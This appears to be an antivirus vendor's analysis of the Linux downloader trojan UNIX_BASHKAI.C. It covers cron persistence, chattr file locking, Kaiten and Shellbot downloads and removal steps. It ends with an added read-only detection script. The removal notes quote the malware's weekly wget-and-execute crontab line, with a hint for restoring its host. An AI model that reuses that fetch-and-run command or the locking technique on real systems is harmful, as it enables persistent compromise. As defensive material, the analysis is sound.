Analysis by: Christopher Daniel So

PLATFORM: Windows


  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel: Dropped by other malware, Downloaded from the Internet

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size: Varies
File Type: Script
Memory Resident: No
Initial Samples Received Date: 13 Oct 2014
Payload: Connects to URLs/IPs, Downloads files, Drops files

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

NOTES:

It drops the file /etc/cron.weekly/00logrotate, a script that downloads http://{BLOCKED}host.us/bots/regular.bot, saves it as /tmp/sh, executes it, and then deletes the downloaded /tmp/sh.

It schedules the weekly download and execution of http://{BLOCKED}host.us/bots/regular.bot by appending it to the cron table.

It sets the read-only attribute of the files /etc/init.d/ssh, /etc/cron.weekly/00logrotate, /etc/init.d/rc, /usr/bin/crontab, /var/spool/cron/crontabs/root.

It creates a copy of /usr/bin/chattr to /usr/bin/chattr. It removes all permissions from /usr/bin/chattr and sets its read-only attribute.

The downloaded file /tmp/sh from http://{BLOCKED}host.us/bots/regular.bot, also detected by Trend Micro as UNIX_BASHKAI.C, downloads from the following URLs:

  • http://{BLOCKED}host.us/manual/a.c (saved as /tmp/a.c) - detected by Trend Micro as TROJ_KAITEN.A
  • http://{BLOCKED}host.us/manual/pb (saved as /tmp/p) - detected by Trend Micro as PERL_SHELLBOT.SM
  • http://{BLOCKED}host.us/manual/b (saved as /tmp/b) - detected by Trend Micro as ELF_KAITEN.SM
  • http://{BLOCKED}host.us/bots/persist (saved as /tmp/malware.must.live) - also detected by Trend Micro as UNIX_BASHKAI.C

Using the installed GNU compiler, it compiles /tmp/a.c to /tmp/kjournald.

It executes the compiled file /tmp/kjournald and the downloaded files /tmp/p, /tmp/b, and /tmp/malware.must.live and deletes them afterwards.

The downloaded file /tmp/malware.must.live is the same as the downloader of http://{BLOCKED}host.us/bots/regular.bot, except that it deletes /usr/bin/chattr before terminating.

  SOLUTION

Minimum Scan Engine: 9.700
FIRST VSAPI PATTERN FILE: 11.208.06
FIRST VSAPI PATTERN DATE: 13 Oct 2014

Step 1

Remove malware/grayware files dropped/downloaded by UNIX_BASHKAI.C. (Note: Please skip this step if the threats listed below have already been removed.)

    • ELF_KAITEN.SM
    • PERL_SHELLBOT.SM
    • TROJ_KAITEN.A

Step 2

Scan your computer with your Trend Micro product to delete files detected as UNIX_BASHKAI.C. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.

NOTES:

In the system's terminal, type the following commands:

chattr -isa /etc/cron.weekly/00logrotate
chattr -isa /etc/init.d/rc
chattr -isa /etc/init.d/ssh
chattr -isa /usr/bin/crontab
chattr -isa /var/spool/cron/crontabs/root
chmod 755 /usr/bin/chattr
rm /etc/cron.weekly/00logrotate
rm /tmp/kjournald

To remove the crontab autostart entry, export the current crontab to a temporary file by typing the following command in the system's terminal: crontab -l > /tmp/cron.tmp

Using a text editor, edit the temporary file /tmp/cron.tmp to remove the following line (replaced {BLOCKED} with "stable"):

@weekly wget -q http://{BLOCKED}host.us/bots/regular.bot -O /tmp/sh; sh /tmp/sh; rm -rf /tmp/sh >/dev/null 2>&1

Type the following commands to remove the cron autostart entry and to delete the temporary file:

crontab /tmp/cron.tmp
rm /tmp/cron.tmp
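A read-only check for the indicators this advisory lists, added here as an example (not Trend Micro's code or the page's own commands): it reports the dropped cron script, the compiled /tmp/kjournald, a /usr/bin/chattr with its permissions stripped, immutable or append-only flags on the locked files, and the weekly crontab entry, without changing anything. The ROOT and CRONTAB variables are assumptions of this example so it can be run against a staged directory and a saved crontab listing; on a live system it needs lsattr from e2fsprogs.

```shell
#!/bin/sh
# Read-only check for the UNIX_BASHKAI.C persistence indicators described above.
# ROOT lets the check run against a staged copy of a filesystem (empty means the
# live system); CRONTAB may point at a saved "crontab -l" listing (otherwise the
# live crontab is read). Both are assumptions of this example, not of the advisory.
ROOT="${ROOT:-}"

# Reads a crontab listing on stdin and prints lines that look like the weekly
# downloader entry (fetches regular.bot into /tmp/sh and runs it).
bashkai_cron_hits() {
    grep -E 'regular\.bot|[ ;]/tmp/sh($|[ ;])' || true
}

# Returns 0 when an lsattr output line carries the immutable (i) or append-only
# (a) flag, the locks that the "chattr -isa" commands above clear.
# lsattr prints e.g. "----i---------e----- /etc/init.d/rc" (constructed sample).
lsattr_line_is_locked() {
    flags="${1%% *}"
    case "$flags" in *i*|*a*) return 0 ;; *) return 1 ;; esac
}

# Prints one line per indicator found; returns 0 if any was found, 1 if none.
bashkai_check() {
    found=1
    for f in /etc/cron.weekly/00logrotate /tmp/kjournald; do
        [ -e "$ROOT$f" ] && { echo "file present: $f"; found=0; }
    done
    if [ -e "$ROOT/usr/bin/chattr" ] && [ ! -x "$ROOT/usr/bin/chattr" ]; then
        echo "chattr disabled: /usr/bin/chattr has no execute permission"; found=0
    fi
    # Immutable/append-only flags on the files the malware locks (needs lsattr).
    for f in /etc/init.d/ssh /etc/cron.weekly/00logrotate /etc/init.d/rc \
             /usr/bin/crontab /var/spool/cron/crontabs/root; do
        [ -e "$ROOT$f" ] || continue
        line=$(lsattr -d "$ROOT$f" 2>/dev/null) || continue
        lsattr_line_is_locked "$line" && { echo "locked: $f"; found=0; }
    done
    if [ -n "${CRONTAB:-}" ]; then
        hits=$(bashkai_cron_hits < "$CRONTAB")
    else
        hits=$(crontab -l 2>/dev/null | bashkai_cron_hits)
    fi
    [ -n "$hits" ] && { echo "crontab entry: $hits"; found=0; }
    return $found
}

# "sh bashkai_check.sh run" performs the check; sourcing only defines functions.
if [ "${1:-}" = "run" ]; then bashkai_check; fi
```

Any "locked:" line means the chattr -isa commands above still have to be run before the file can be removed; the script itself never modifies the system.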
